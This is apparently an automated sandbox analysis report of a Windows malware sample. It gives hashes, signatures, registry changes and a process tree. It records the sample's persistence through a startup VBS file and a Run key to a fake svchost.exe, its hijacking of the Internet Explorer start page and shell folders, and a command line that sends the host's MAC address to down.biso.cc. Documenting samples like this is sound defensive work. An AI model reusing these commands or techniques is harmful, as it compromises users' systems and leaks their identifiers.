Analysis
-
max time kernel
151s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
30/12/2023, 09:28
Static task
static1
Behavioral task
behavioral1
Sample
1481721ea6d463f3b093a57307af8620.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
1481721ea6d463f3b093a57307af8620.exe
Resource
win10v2004-20231215-en
General
-
Target
1481721ea6d463f3b093a57307af8620.exe
-
Size
191KB
-
MD5
1481721ea6d463f3b093a57307af8620
-
SHA1
44453df9ff359cc35771ab2b7ddff9a5eee1a8af
-
SHA256
7b98de0154a6dd70e2fc1151911f328f74a068b80408285aeb5bb27fec1a6768
-
SHA512
4ca12c661522d2e329f5f1c5d5b3bf327c859f7367626f07732860b1e8e13f721d6cfcf3b045929f9210f943242167312e8c2357fe4773c6f7eff7424bc9392e
-
SSDEEP
3072:T/na6WDmrZ5Cn79xvlr2xmOJ5wUuWXcfb0hw7IACb873684yVcx566/znwVxIPGV:T/nuDm9knmhJ4/sMLuO6/zjGLN8lk
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation 1481721ea6d463f3b093a57307af8620.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.vbs 1481721ea6d463f3b093a57307af8620.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.vbs 1481721ea6d463f3b093a57307af8620.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ÓÃÓÚϵͳµÇ¼µÄÎļþ£¬É¾³ýµôÎÞ·¨Õý³£µÇ¼ϵͳ¡£ = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" 1481721ea6d463f3b093a57307af8620.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0a8399ce63cda01 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c4e92002c4a416439bca1d31c27b840500000000020000000000106600000001000020000000df0e95d1797bd3a976a8496a68df39408e9c403e4203385428612bb24a28d084000000000e80000000020000200000007dcbd4fb396750043520f5ef412a8932407803dee756a9d7dc86b5ef3a4b7b7220000000d686f225f804a48a56a9bcd6f2062dbfb3821379a009011e58839af9bb0e281f40000000e544762c5a05c6a66553485a6a26aa1511f28fd57fb3a08dddc33f265421ad476a651e8fc91b55401e19eeaf325d3526b024508280b305f10b450f65c4940fd5 IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2606028040" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31079654" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c4e92002c4a416439bca1d31c27b840500000000020000000000106600000001000020000000c17b0251b2dd9812d0987c6659609e475034a4e4d1c19bc8262bc79fc0113bd5000000000e80000000020000200000001c35ad0a166ad4e3996964472d19d318eb4bbb24c8d933c1643b00b448c06c8d200000005d2f9c8f9a17aee74097024929706d3a454b115e3a08a11b987f9e6fc24da55840000000079ada481c6e45dc0cef52d5eaa159e39b89c402db321f35940fff3946dca4e01d1c7fe58a0a0838a1d42a49bb242ed3514adc17e79bc6c1f3a6e40f387d55bf IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Software\Microsoft\Internet Explorer\DomainSuggestion IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{C4A32539-A8D9-11EE-BB4F-F68B0B0A1028} = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2606028040" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0369d9ae63cda01 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Software\Microsoft\Internet Explorer\Main 1481721ea6d463f3b093a57307af8620.exe Set value (int) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31079654" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "410901351" IEXPLORE.EXE -
Modifies Internet Explorer start page 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://www.7400.net" 1481721ea6d463f3b093a57307af8620.exe -
Modifies registry class 30 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder regini.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID 1481721ea6d463f3b093a57307af8620.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39119718-2782-9428-3911-278277420997} 1481721ea6d463f3b093a57307af8620.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39119718-2782-9428-3911-278277420997}\InProcServer32\ThreadingModel = "Apartment" 1481721ea6d463f3b093a57307af8620.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39119718-2782-9428-3911-278277420997}\Instance\InitPropertyBag\Param2 = "%ProgramFiles(x86)%\\Internet Explorer\\iexplore.exe" 1481721ea6d463f3b093a57307af8620.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39119718-2782-9428-3911-278277420997}\Instance\InitPropertyBag\Param1 = "http://%77%77%77%2e%37%34%30%30%2e%6e%65%74" 1481721ea6d463f3b093a57307af8620.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder regini.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39119718-2782-9428-3911-278277420997}\InProcServer32 1481721ea6d463f3b093a57307af8620.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39119718-2782-9428-3911-278277420997}\shellex\MayChangeDefaultMenu\ 1481721ea6d463f3b093a57307af8620.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39119718-2782-9428-3911-278277420997}\Instance\InitPropertyBag\command = "´ò¿ªÖ÷Ò³" 1481721ea6d463f3b093a57307af8620.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39119718-2782-9428-3911-278277420997}\Instance\InitPropertyBag 1481721ea6d463f3b093a57307af8620.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39119718-2782-9428-3911-278277420997}\Instance\InitPropertyBag\CLSID = "{13709620-C279-11CE-A49E-444553540000}" 1481721ea6d463f3b093a57307af8620.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder 1481721ea6d463f3b093a57307af8620.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} regini.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node 1481721ea6d463f3b093a57307af8620.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39119718-2782-9428-3911-278277420997}\InProcServer32\ = "%SystemRoot%\\SysWow64\\shdocvw.dll" 1481721ea6d463f3b093a57307af8620.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39119718-2782-9428-3911-278277420997}\shellex 1481721ea6d463f3b093a57307af8620.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} 1481721ea6d463f3b093a57307af8620.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39119718-2782-9428-3911-278277420997}\Instance 1481721ea6d463f3b093a57307af8620.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39119718-2782-9428-3911-278277420997}\Instance\CLSID = "{3f454f0e-42ae-4d7c-8ea3-328250d6e272}" 1481721ea6d463f3b093a57307af8620.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} regini.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex 1481721ea6d463f3b093a57307af8620.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39119718-2782-9428-3911-278277420997}\Instance\InitPropertyBag\method = "ShellExecute" 1481721ea6d463f3b093a57307af8620.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex\ContextMenuHandlers\ieframe regini.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex\ContextMenuHandlers\ieframe regini.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shellex\ContextMenuHandlers 1481721ea6d463f3b093a57307af8620.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell regini.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shellex\ContextMenuHandlers\ieframe 1481721ea6d463f3b093a57307af8620.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shellex\ContextMenuHandlers\ieframe 1481721ea6d463f3b093a57307af8620.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39119718-2782-9428-3911-278277420997}\shellex\MayChangeDefaultMenu 1481721ea6d463f3b093a57307af8620.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\"%ProgramFiles(x86)%\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} 1481721ea6d463f3b093a57307af8620.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3644 IEXPLORE.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 3644 IEXPLORE.EXE 3644 IEXPLORE.EXE 832 IEXPLORE.EXE 832 IEXPLORE.EXE 832 IEXPLORE.EXE 832 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 5072 wrote to memory of 3372 5072 1481721ea6d463f3b093a57307af8620.exe 91 PID 5072 wrote to memory of 3372 5072 1481721ea6d463f3b093a57307af8620.exe 91 PID 5072 wrote to memory of 3372 5072 1481721ea6d463f3b093a57307af8620.exe 91 PID 5072 wrote to memory of 4004 5072 1481721ea6d463f3b093a57307af8620.exe 92 PID 5072 wrote to memory of 4004 5072 1481721ea6d463f3b093a57307af8620.exe 92 PID 5072 wrote to memory of 4004 5072 1481721ea6d463f3b093a57307af8620.exe 92 PID 3372 wrote to memory of 3644 3372 iexplore.exe 93 PID 3372 wrote to memory of 3644 3372 iexplore.exe 93 PID 4004 wrote to memory of 4780 4004 cmd.exe 95 PID 4004 wrote to memory of 4780 4004 cmd.exe 95 PID 4004 wrote to memory of 4780 4004 cmd.exe 95 PID 5072 wrote to memory of 4272 5072 1481721ea6d463f3b093a57307af8620.exe 96 PID 5072 wrote to memory of 4272 5072 1481721ea6d463f3b093a57307af8620.exe 96 PID 5072 wrote to memory of 4272 5072 1481721ea6d463f3b093a57307af8620.exe 96 PID 4272 wrote to memory of 536 4272 cmd.exe 99 PID 4272 wrote to memory of 536 4272 cmd.exe 99 PID 4272 wrote to memory of 536 4272 cmd.exe 99 PID 3644 wrote to memory of 832 3644 IEXPLORE.EXE 100 PID 3644 wrote to memory of 832 3644 IEXPLORE.EXE 100 PID 3644 wrote to memory of 832 3644 IEXPLORE.EXE 100 PID 5072 wrote to memory of 2868 5072 1481721ea6d463f3b093a57307af8620.exe 101 PID 5072 wrote to memory of 2868 5072 1481721ea6d463f3b093a57307af8620.exe 101 PID 5072 wrote to memory of 2868 5072 1481721ea6d463f3b093a57307af8620.exe 101 PID 2868 wrote to memory of 3420 2868 cmd.exe 103 PID 2868 wrote to memory of 3420 2868 cmd.exe 103 PID 2868 wrote to memory of 3420 2868 cmd.exe 103 PID 5072 wrote to memory of 2956 5072 1481721ea6d463f3b093a57307af8620.exe 104 PID 5072 wrote to memory of 2956 5072 1481721ea6d463f3b093a57307af8620.exe 104 PID 5072 wrote to memory of 2956 5072 1481721ea6d463f3b093a57307af8620.exe 104 PID 2956 wrote to memory of 5088 2956 cmd.exe 106 PID 2956 wrote to memory of 5088 2956 cmd.exe 106 PID 2956 wrote to memory of 5088 2956 cmd.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\1481721ea6d463f3b093a57307af8620.exe"C:\Users\Admin\AppData\Local\Temp\1481721ea6d463f3b093a57307af8620.exe"1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://down.biso.cc/b/tj.asp?mac=F6:8B:0B:0A:10:28&tid=1481721ea6d463f3b093a57307af86202⤵
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://down.biso.cc/b/tj.asp?mac=F6:8B:0B:0A:10:28&tid=1481721ea6d463f3b093a57307af86203⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3644 CREDAT:17410 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:832
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c regini C:\Users\Admin\AppData\Local\Temp\509617_s.ini2⤵
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\SysWOW64\regini.exeregini C:\Users\Admin\AppData\Local\Temp\509617_s.ini3⤵
- Modifies registry class
PID:4780
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f3⤵PID:536
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c regini C:\Users\Admin\AppData\Local\Temp\509617.ini2⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\SysWOW64\regini.exeregini C:\Users\Admin\AppData\Local\Temp\509617.ini3⤵
- Modifies registry class
PID:3420
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\Shell" /f3⤵PID:5088
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
15KB
MD51a545d0052b581fbb2ab4c52133846bc
SHA162f3266a9b9925cd6d98658b92adec673cbe3dd3
SHA256557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1
SHA512bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
411B
MD5390f961a0d7fe7e4f89de6d8714df6ac
SHA1b917d8facc1fe041cbd3b9d769f43ac953a3ae79
SHA256c7d2ae524b8899a39d16b95491dd982c2e72e9a04a204b27d53139f15bb24cff
SHA512e962e0cf4051f9060c892e98f526ef679b4d88d62dbbd12a074958a12a030e540c13ce1723f93c56a2bc31f7d46fd7e8fb7694c8530761f5f29b812a9fcfc255
-
Filesize
508B
MD54f579df6091967f772a34113eb550ea3
SHA103f14635e60f5245c91a73b6b9155567566581ed
SHA256feafe7c6c4c322682a1b8132d595ff70a630c43b4ea99ad52496cf7303e741f1
SHA512646269f7699f288b107f3b70fb28cf6191cd70d8263c259aa6ac9b0d4cd1f5461de7028ff7b666662eeb55090b5e4ef5417a6751b4d0b349a1c8ae6f4b016654